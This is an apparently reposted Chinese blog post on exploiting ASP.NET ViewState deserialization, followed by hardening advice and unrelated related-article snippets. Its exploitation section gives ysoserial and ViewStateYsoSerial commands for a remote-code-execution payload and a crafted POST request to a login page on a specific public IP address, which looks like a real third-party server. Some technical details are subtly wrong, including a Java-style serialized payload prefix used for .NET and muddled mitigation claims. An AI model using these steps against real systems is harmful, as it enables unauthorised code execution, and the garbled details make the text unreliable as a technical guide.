深入解析 ASP.NET 的 ViewState 反序列化漏洞

news2024/12/26 22:52:22

1.  ViewState 基本知识

1.1 什么是 ViewState

ViewState 是 ASP.NET(Active Server Pages .NET)框架用来保持页面状态的一种机制。ASP.NET 是微软开发的用于动态网页服务器端开发的框架,ViewState 是其中用于维护和管理页面状态的一部分。它在客户端和服务器之间存储页面和控件的状态。

1.2 ViewState 的工作原理

  1. 保存页面状态: 每次页面请求和响应,服务器端控件的状态信息需要保存在客户端,待下一次请求时恢复。ViewState 就是在页面生成过程中将控件状态编码并嵌入到页面的隐藏字段中。

  2. 在客户端存储和传输: ViewState 的数据以 Base64 编码格式存储在页面中的一个名为 __VIEWSTATE 的隐藏字段里,随每次表单提交一起传输到服务器。

  3. 恢复页面状态: 页面在提交到服务器后,ASP.NET 会将 __VIEWSTATE 字段的数据提取出来进行解码并恢复控件的状态

1.3 实现细节

在典型的 ASP.NET 页面上,ViewState 数据通常类似如下:

<form id="form1" runat="server">
  <div>
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="dDwtNzI4MjcyOTUzO3Q8O2w8aTwxPjs+" />
    <!-- 其他表单控件 -->
  </div>
</form>

解释:

  • __VIEWSTATE 的 value 属性存储了编码后的数据,这些数据包含了控件的状态信息。

1.4 ViewState的优势和缺点

优势:

  1. 简单实现状态保持:不需要开发者额外的编码,ASP.NET 内部就能自动管理控件的状态。
  2. 减少服务器负载:状态数据存储在客户端,减少服务器存储的压力。

缺点:

  1. 带宽占用:ViewState 数据直接嵌入到 HTML 中,会增加页面大小,从而影响性能。
  2. 安全问题:如果不加密和未正确校验的话,ViewState 数据可能被篡改,进而带来安全隐患。

2. 漏洞形成原因和漏洞利用原理

2.1 漏洞形成原因

  1. ViewState 未加密:如果 ViewState 未加密,攻击者可以通过篡改 ViewState 内容植入恶意代码。
  2. ViewState 未签名或签名不严密:未经签名或者签名不严密的 ViewState 可能被攻击者修改,并在服务器上反序列化执行,从而导致代码执行漏洞。

2.2 漏洞利用原理

利用 ViewState 反序列化漏洞,攻击者可以通过伪造序列化对象,使得 ViewState 执行其嵌入的恶意代码,从而在服务器端执行任意代码(RCE - Remote Code Execution)。

3. 漏洞验证

3.1 提取ViewState数据

通过网页源码提取到 ViewState 数据:

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="POVu3JjlPFxLXHTPREYtUzNM**************************************************************************************ptQ==" />

上面的内容从value属性中提取得到的值是我们需要的重要数据:

POVu3JjlPFxLXHT***********************************************************************************/ptQ==

3.2 使用EnumerationKey解码ViewState数据

接下来,使用EnumerationKey工具来解码ViewState数据,并找到密钥信息。请按照工具的要求提供相关输入:

  1. Modifier: 一般会从页面源代码或服务端配置中进行设置。
  2. Key Path: 指定密钥文件路径,通常包含服务器/应用程序密钥。
  3. ViewState Data: 提取到的长字符串作为ViewState数据输入。

3.3 解码并分析ViewState数据

根据成功率,在完成解密验证后,您会得到相关信息,例如:

  • IsEncrypted: True
  • Validation: SHA1
  • ValidationKey: <Value>
  • Decryption: TripleDES
  • DecryptionKey: <Value>

3.4 生成恶意ViewState数据

  1. 使用ysoserial.net生成payload: 假设要生成一个执行cmd /c whoami命令的ViewState payload:

    ysoserial.exe -g ActivitySurrogateSelector -p "cmd /c whoami" -o base64
    
  2. 结合解元信息

    将生成的payload结合刚刚提取的关键信息进行加密和签名。使用例如ViewStateYsoSerial工具进行操作:

    ViewStateYsoSerial.exe -validationKey 319B474B1******************************* -decryptionKey 280450B********************************* -validation SHA1 -decryption TripleDES -payload rO0ABXNyAC...
    

    最终得到的新ViewState内容。

3.5 发送payload请求

  1. 使用Burp Suite或Postman: 拦截并编辑请求,替换原始的ViewState值为容恶意的ViewState数据。

    POST /FLoginNew.aspx HTTP/1.1
    Host: 106.14.218.28
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1000
    
    __VIEWSTATE=生成的新恶意ViewState内容&其他参数...
    
  2. 验证执行结果: 观察执行结果,如命令whoami返回服务器用户名,则证明漏洞利用成功。

4. 漏洞修复

为了防止ViewState反序列化漏洞,可以进行以下修复措施:

1. 启用ViewState MAC验证(消息认证码)

启用并确保 ViewState 消息认证码验证 (MAC),以防止未授权的篡改:

web.config 文件中,确保设置了正确的 machineKey

<system.web>
  <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" validation="HMACSHA256" decryption="AES" />
</system.web>

这个配置会对 ViewState 数据进行签名操作,保证数据的完整性和真实性。如果数据在传输过程中被篡改,服务器将会识别出来并拒绝。

2. 启用ViewState加密

确保 ViewState 数据传输是加密的,可以防止敏感数据被窃取:

web.config 文件中,配置 ViewState 加密:

<system.web>
  <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
</system.web>

viewStateEncryptionMode 设置为 "Always" 确保所有 ViewState 数据都将进行加密处理。

3. 升级到最新的ASP.NET版本

将您的 ASP.NET 框架升级到最新版本,最新版本中针对 ViewState 安全性进行了多个改进:

确保您的应用程序和服务器运行在最新版本的 ASP.NET 和 .NET Framework 上。

4. 限制反序列化对象的类型

限制 ASP.NET 只允许序列化和反序列化必要的安全类型:

启用 ASP.NET 4.5 引入的 ViewStateUserKey 机制,绑定 ViewState 数据到用户会话。

6. 安全编码和验证
  1. 输入验证:

    确保所有用户输入都经过严格验证和过滤,避免恶意代码注入。

  2. 反序列化过滤:

    在反序列化数据前,确保已经对数据进行了完整性检查和验证。

5. 总结

在本文中,我们深入探讨了 ASP.NET 中的 ViewState 反序列化漏洞,包括其原理、如何验证漏洞的存在、以及如何修复漏洞。通过全面理解该漏洞的工作机制,我们可以更加有效地保护应用程序免受攻击。

关键点回顾:

  1. ViewState 反序列化漏洞原理

    • ViewState 通过 Base64 编码,将页面和控件的状态信息传递给客户端和服务器。
    • 如果 ViewState 未加密或未正确签名,攻击者可以篡改 ViewState 数据并执行恶意代码。
  2. 验证漏洞存在

    • 通过提取网页源代码中的 ViewState 数据,并使用工具来生成和验证恶意的 ViewState payload,测试服务器是否存在漏洞。
  3. 修复漏洞的方法

    • 启用 ViewState 的 MAC 验证和加密,以确保数据完整性和安全性。
    • 升级到最新版本的 ASP.NET 框架,获取最新的安全改进。
    • 限制 ViewState 的使用,仅在必要时启用,并采用安全的编码实践和严格的数据验证。
  4. 安全实践

    • 定期审计和更新安全配置,确保应用程序持续处于最佳安全状态。
    • 采用全面的安全编码和验证措施,避免潜在的安全风险。

参考资料:

GPT4.0

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2081029.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

netty编程之结合springboot一起使用

写在前面 源码 。 本文看下netty结合springboot如何使用。 1&#xff1a;netty server部分 server类&#xff08;不要main&#xff0c;后续通过springboot来启动咯!&#xff09;&#xff1a; package com.dahuyou.netty.springboot.server;import io.netty.bootstrap.Serve…

设置视图的宽高

AndroidManifest.xml <?xml version"1.0" encoding"utf-8"?> <manifest xmlns:android"http://schemas.android.com/apk/res/android"><applicationandroid:allowBackup"true"android:icon"mipmap/ic_launcher…

JS 实现栈和队列

JS实现栈和队列 栈是先进后出 function Stack() {this.arr [];// push方法是把数据放入栈中this.push function (value) {this.arr.push(value);}// pop 是取数组的最后一个数据&#xff0c;从而实现先进后出this.pop function () {this.arr.pop();} }var stack new Stac…

Spring如何既返回实体同时下载文件

业务背景&#xff1a;下载文件的接口需要返回文件信息或者密码等信息&#xff0c;这时候就需要接口返回文件及相关实体信息&#xff1b; 在Spring中&#xff0c;如果你需要在同一个请求中既下载文件也返回一个实体信息&#xff0c;你需要特别注意HTTP协议本身并不直接支持这种操…

Matplotlib 详解

1. 基本概念和历史背景 Matplotlib核心概念详解 Matplotlib 是 Python 中最流行的数据可视化库之一&#xff0c;它提供了一系列强大且灵活的工具&#xff0c;用于创建各种类型的图表和图形。无论你是数据科学家、工程师还是研究人员&#xff0c;理解 Matplotlib 的核心概念都…

机加工行业MES系统的特点及优势

一、机加工行业MES系统的特点 机加工行业MES系统作为面向制造企业车间执行层的生产信息化管理系统&#xff0c;具有以下几个显著特点&#xff1a; 高度定制化&#xff1a;由于不同机加工企业的生产流程和业务需求千差万别&#xff0c;MES系统的搭建需要高度定制化&#xff0c;…

93.WEB渗透测试-信息收集-Google语法(7)

免责声明&#xff1a;内容仅供学习参考&#xff0c;请合法利用知识&#xff0c;禁止进行违法犯罪活动&#xff01; 内容参考于&#xff1a; 易锦网校会员专享课 上一个内容&#xff1a;92.WEB渗透测试-信息收集-Google语法&#xff08;6&#xff09; • intext • intext 的作…

Java 使用 POI 导出Excel,实现横向和纵向的合并单元格

在使用Apache POI的库生成Excel的时候&#xff0c;有时候需要在导出的文件中合并单元格&#xff0c;比如对excel文件形成统一的标题栏&#xff0c;改如何写这个代码呢&#xff1f;下面是一个示例代码&#xff0c;演示如何横向和纵向合并单元格。 代码 import org.apache.poi.s…

Java新手零基础教程!(●‘◡‘●)运算符类型讲解

Java 算术运算符 Java教程 - Java算术运算符 在数学表达式中使用算术运算符。 所有算术运算符 下表列出了算术运算符: 运算符结果加法-减法*乘法/除法%余数自增加法分配-减法分配*乘法分配/除法分配%模量分配--自减 算术运算符的操作数必须是数字类型。您不能在 boolean 类…

55.基于IIC协议的EEPROM驱动控制(2)

升腾A7pro的EEPROM芯片为24C64芯片&#xff0c;器件地址为1010_011。 &#xff08;1&#xff09;Visio整体设计视图&#xff08;IIC_SCL为250KHz&#xff0c;IIC_CLK为1MHz&#xff0c;addr_num为1&#xff0c;地址字节数为2字节&#xff0c;addr_num为0&#xff0c;地址字节数…

Windows Docker 部署 SolrCloud

一、简介 Solr 集群是一个基于 Lucene 的高性能全文搜索服务器集群&#xff0c;它通过集成 ZooKeeper 来实现分布式索引和搜索功能。Solr 集群具备以下特点&#xff1a; 分布式索引与搜索&#xff1a;Solr 能够将大索引分成多个小索引&#xff0c;分布在多个节点上&#xff0…

网络安全实训六(靶机实例DC-3)

1 信息收集 1.1 获取靶机IP 1.2 扫描靶机网站的目录 1.3 扫描端口和服务器信息 1.4 进入网站 1.5 在msf中给搜索joomla扫描器 1.6 设置参数查看joomla版本信息 1.7 按照版本号搜索漏洞 1.8 查看漏洞使用 2 渗透 2.1 查看是否存在SQL注入 2.2 获取到数据库信息 2.3 爆破列表 2…

Datawhale AI夏令营第五期学习!

学习日志 日期&#xff1a; 2024年8月27日 今日学习内容&#xff1a; 今天&#xff0c;我学习了如何在深度学习任务中使用卷积神经网络&#xff08;CNN&#xff09;进行图像分类的基本流程&#xff0c;并成功地在JupyterLab中运行了一个完整的项目。以下是我今天的学习和操作…

【html+css 绚丽Loading】000021 万象轮回珠

前言&#xff1a;哈喽&#xff0c;大家好&#xff0c;今天给大家分享htmlcss 绚丽Loading&#xff01;并提供具体代码帮助大家深入理解&#xff0c;彻底掌握&#xff01;创作不易&#xff0c;如果能帮助到大家或者给大家一些灵感和启发&#xff0c;欢迎收藏关注哦 &#x1f495…

使用C#进行屏幕截图(screenCapturer)

1.具体是应用了Nuget包 ScreenCapturer 2.编写相关核心代码&#xff0c;实现截取电脑部分区域图片 ScreenCapturer.ScreenCapturerTool screenCapturer new(); if (screenCapturer.ShowDialog() DialogResult.OK) {Bitmap bmp (Bitmap)screenCapturer.Image;pictureBox1.Ba…

【不合理的递归区间】快排递归引发区间错误,除以0未定义

问题描述 力扣语法报错&#xff1a;含义是有可能会除以0&#xff0c;该行为未定义&#xff0c;但问题是我这里压根就没用到除法。 #include<stdlib.h> #include<time.h>class Solution { public:vector<int> sortArray(vector<int>& nums) {sra…

【JavaWeb】定时任务和批量插入数据库数据

定时任务 需要在项目启动类添加注解开启支持定时任务&#xff1a; 以下示例是定时任务插入数据的操作&#xff1a; package com.yupi.yupao.once.importuser;import com.yupi.yupao.mapper.UserMapper; import com.yupi.yupao.model.domain.User; import org.springframework…

软件测试——论坛系统测试用例

功能测试 其他测试 测试用例 用例编号 用例描述 优先级 预置条件 操作步骤 测试数据 预期结果 测试结果Bug ID软件版本测试员SNS_User_Register_001注册成功使用合法的数据成功注册一个新账号P11、已打开注册页面 2、准备一个未注册用户信息1、输入用户昵称 2、输入用户名 3、…

Unity(2022.3.41LTS) - 摄像机

目录 一、基本概念 二、重要属性 三、摄像机模式 四、脚本控制 五、渲染设置 六. 组件详细介绍 一、基本概念 作用&#xff1a;摄像机决定了玩家在游戏中能够看到的内容。它就像是玩家的眼睛&#xff0c;从特定的位置和角度观察场景&#xff0c;并将场景中的物体渲染到屏…

北冥坞“学件”系统

简介 学件由周志华教授在 2016 年提出 [1, 2]。在学件范式下&#xff0c;世界各地的开发者可分享模型至学件基座系统&#xff0c;系统通过有效查搜和复用学件帮助用户高效解决机器学习任务&#xff0c;而无需从零开始构建机器学习模型。 北冥坞是学件的第一个系统性开源实现&…